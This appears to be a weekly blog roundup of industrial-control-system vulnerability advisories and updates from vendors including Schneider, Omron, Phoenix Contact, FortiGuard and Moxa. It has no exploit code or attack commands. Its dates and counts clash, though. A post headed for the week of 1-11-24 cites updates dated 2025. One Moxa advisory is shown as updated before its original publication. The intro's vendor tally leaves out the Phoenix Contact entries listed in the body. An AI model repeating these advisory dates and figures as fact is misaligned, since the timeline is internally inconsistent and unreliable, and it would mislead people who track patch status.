Public ICS Disclosures – Week of 1-11-24

Part 2

For Part 2 we have 14 additional vendor disclosures from Omron (2), Schneider (9), Splunk (2), and Zyxel. We also have 9 vendor updates from FortiGuard (4), HP (2), Mitsubishi, Moxa, and Schneider. Part 3 with Siemens updates, researcher reports, and exploits will come out later this week.

Omron Advisories

Omron published an advisory that describes a path traversal vulnerability in their NJ/NX-series Machine Automation Controllers. Omron has a new version that mitigates the vulnerability.

Omron published an advisory that describes an improper restriction of an XML external entity reference vulnerability in their NB-series NX-Designer. The vulnerability was reported by Michael Heinzl. Omron has a new version that mitigates the vulnerability.

Phoenix Contact Advisories

Phoenix Contact published an advisory that describes an incorrect permission assignment for critical resource vulnerability in their CHARX-SEC3xxx Charge controllers. The vulnerability was reported by Tien Phan and Richard Jaletzki. Phoenix Contact has a new version that mitigates the vulnerability.

Phoenix Contact published an advisory that discusses an observable discrepancy vulnerability (with publicly available exploit) in their ESL Stick USB-A. This is a third-party (Yubico) vulnerability reported (w/POC) by NinjaLab.io. A new version of the dongle firmware is available.

Schneider Advisories

Schneider published an advisory that describes an incorrect calculation of buffer size vulnerability in their Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC. Schneider has new versions that mitigate the vulnerability.

Schneider published an advisory that describes an improper enforcement of message integrity in a communication channel vulnerability in their Pro-face GP-Pro EX and Remote HMI. The vulnerability was reported by Haichuan Xu of Georgia Institute of Technology. Schneider provides generic mitigation measures.

Schneider published an advisory that discusses an out-of-bounds write vulnerability in their Modicon 580 and Modicon Quantum communications modules. This is a third-party (WindRiver) vulnerability. Schneider has a new version for one of the affected products.

Schneider published an advisory that describes an improper restriction of XML external entity reference in their Web Designer for Modicon Communication Modules. The vulnerability was reported by Jin Huang of ADLab of Venustech. Schneider provides generic mitigation measures.

Schneider published an advisory that describes an exposure of sensitive information to an unauthorized actor vulnerability in their Web Server on Modicon M340. Schneider has a new version for one of the affected product that mitigates the vulnerability.

Schneider published an advisory that describes a deserialization of untrusted data vulnerability in their RemoteConnect and SCADAPack x70 Utilities. Schneider provides generic mitigation measures.

Schneider published an advisory that discusses an uncontrolled search path element vulnerability in multiple Schneider products using FlexNet Publisher. This is a third-party (Revenera) vulnerability. Schneider has new versions that mitigate the vulnerability.

Schneider published an advisory that describes two vulnerabilities in their PowerLogic HDPM6000 High-Density Metering System. Schneider has a new version that mitigates the vulnerability.

The two reported vulnerabilities are:

• Authorization bypass through user-controlled key - CVE-2024-10497, and

• Improper restriction of operation within the bounds of a memory buffer - CVE-2024-10498

Schneider published an advisory that describes an improper restriction of operations within the bounds of a memory buffer vulnerability in their EcoStruxure Power Build Rapsody. The vulnerability was reported by Michael Heinzl. Schneider has a new version that mitigates the vulnerability.

NOTE: Heinzl actually published reports of five vulnerabilities that it Schneider has lumped into this single CVE; Heinzl reports that: “Vendor states that all five reported vulnerabilities have the same root cause, and therefore only assign one CVE.” Those reports include an interesting timeline of the discussion with Schneider. Those reported vulnerabilities are:

• Heap-based buffer overflow (2) - AWE-2025-006 and AWE-2025-005,

• Stack-based buffer overflow - AWE-2025-004, and

• File parsing memory corruption (2) - AWE-2025-003 and AWE-2025-002

Splunk Advisories

Splunk published an advisory that describes a regular expression denial-of-service vulnerability in their Splunk Supporting Add-on for Active Directory (SA-ldapsearch). Splunk has a new version that mitigates the vulnerability.

Splunk published an advisory that describes an improper privilege management vulnerability in their Splunk App for SOAR. Splunk has a new version that mitigates the vulnerability.

Zyxel Advisory

Zyxel published an advisory that describes an improper privilege management vulnerability in their APs and security router devices. The vulnerability was reported by Alessandro Sgreccia from HackerHood. Zyxel has new versions that mitigate the vulnerability.

FortiGuard Updates

FortiGuard published an update for their buffer overflow advisory that was originally published on May 14^th, 2024, and most recently updated on June 19^th, 2024. The new information includes adding IPS package info.

FortiGuard published an update for their HTTP2 Rapid Reset advisory that was originally published on February 8^th, 2024, and most recently updated on June 19^th, 2024. The new information includes adding IPS package info.

FortiGuard published an update for their out-of-bounds write advisory that was originally published on February 8^th, 2024, and most recently updated on February 23^rd, 2025. The new information includes adding IPS package info.

FortiGuard published an update for their path traversal advisory that was originally published on October 10^th, 2023. The new information includes adding FortiAnalyzer-BigData.

HP Updates

HP published an update for their Intel 2024.3 IPU advisory that was originally published on October 18^th, 2024. The new information includes updating version and softpaq information for Business Notebooks, Business Desktops, Point-of-Sales Systems, Workstations, and Thin Clients.

HP published an update for their Intel 2024.3 IPU advisory that was originally published on October 17^th, 2024. The new information includes updating version and SoftPaq information for Business Notebooks, Business Desktops, Point-of-Sales Systems, Workstations, and Thin Clients.

Mitsubishi Update

Mitsubishi published an update for their GENESIS64TM and MC Works64 advisory that was originally published on November 28^th, 2025. The new information includes updating "Overview," "Description," and "Mitigations / Workarounds."

Moxa Update

Moxa published an update for their Cellular Routers advisory that was originally published on January 15^th, 2025, and most recently updated on January 10^th, 2025. The new information includes updating the solution for the NAT-102 Series.

Schneider Update

Schneider published an update for their BadAlloc advisory that was originally published on November 9^th, 2021, and most recently updated on November 12^th, 2024. The new information includes announcing that remediation is available for Modicon X80 module, part number BMENOS0300.